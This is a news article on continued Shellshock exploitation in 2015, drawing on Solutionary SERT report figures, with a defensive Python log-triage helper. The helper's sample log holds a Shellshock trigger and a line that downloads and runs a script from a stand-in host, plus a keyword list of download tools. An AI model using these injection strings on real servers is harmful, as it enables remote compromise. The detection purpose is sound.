Shellshock, the Bash bug heralded as the next Heartbleed, is still being successfully exploited by attackers 10 months after it was revealed to the world.
Discovered in late September 2014, the bug has gone through a series of patches, but as the Solutionary Security Engineering Research Team (SERT) points out in its 2015 Q2 report, Shellshock is alive and well and is still being used even now.
SERT identified over 600,000 Shellshock-related events in the last 3 months, spread across 25,000 unique IP addresses and originating from 2,027 various service providers, businesses, and industries.
Attackers checked for Shellshock vulnerability before executing the payload
Profiling the attacks, Solutionary’s SERT team observed that “nearly 60% of identified Shellshock traffic was designed to determine if the hosts were vulnerable.”
If the check came back positive, attackers would then download and execute bash shell scripts, putting the compromised servers to their own uses.
Besides shell scripts, SERT also identified attack payloads delivered as .c.txt files, ELF binaries, and Perl and PHP scripts.
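As an added example (not from Solutionary’s report), a small Python triage helper that picks Shellshock-style requests out of Apache combined-format access log lines and separates pure vulnerability probes from payload-delivery attempts, mirroring the report’s probe-versus-payload split. The log lines, IP addresses and hostnames are constructed; the Bash exported-function trigger it matches is the well-known CVE-2014-6271 pattern.

```python
import re

# Apache "combined" log format: ip ident user [ts] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The Shellshock trigger: a Bash exported-function definition followed by a trailing command.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{\s*:;\s*\};\s*(?P<cmd>.*)')
# Tokens suggesting the trailing command fetches or runs a payload rather than just probing.
PAYLOAD_TOKENS = ("wget", "curl", "fetch", "bash ", "sh ", "perl", "php", ".c.txt", "chmod")

def classify(line):
    """Return (source_ip, 'probe' | 'payload') for a Shellshock-style request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # The trigger can arrive in any header that the CGI passes into the environment.
    for field in ("req", "referer", "ua"):
        hit = SHELLSHOCK_RE.search(m.group(field))
        if hit:
            cmd = hit.group("cmd").lower()
            kind = "payload" if any(t in cmd for t in PAYLOAD_TOKENS) else "probe"
            return m.group("ip"), kind
    return None

def summarize(lines):
    """Count events per class and collect unique source IPs, as the SERT figures do."""
    counts = {"probe": 0, "payload": 0}
    sources = set()
    for line in lines:
        result = classify(line)
        if result:
            ip, kind = result
            counts[kind] += 1
            sources.add(ip)
    return counts, sources

# Constructed sample log lines (not real traffic); the third line is a payload-fetch attempt.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jul/2015:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; echo vulnerable"',
    '198.51.100.7 - - [10/Jul/2015:10:00:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Jul/2015:10:00:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { :; }; /usr/bin/wget -O /tmp/x.sh example.invalid/x.sh; sh /tmp/x.sh" "-"',
]

if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```

Run against a real access log, the same probe-then-payload sequence from one source IP is the pattern worth alerting on, since it matches the two-stage behaviour the report describes.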
Nearly half of attacks originated from the US
The sources of the attacks are mainly located in the US, UK, China, South Korea, Germany, and Japan.
This shouldn’t surprise anyone, since these countries are also where classic and cloud-based hosting services are most often located.
Since hosting servers run on POSIX systems and are vulnerable, it was no surprise to the SERT team to discover that most attacks are carried out via ISPs, with GoDaddy and Korea Telecom being the two most abused.
As for the targets of the Shellshock attacks, the education sector was hit hardest with 38% of all detected events, followed by technology (17%), healthcare (6%), finance (5%), and manufacturing (5%).
Besides one-off attacks, Solutionary also observed more organized operations: Shellshock campaigns carried out by well-organized groups that paid special attention to covering their tracks. The most important are listed below: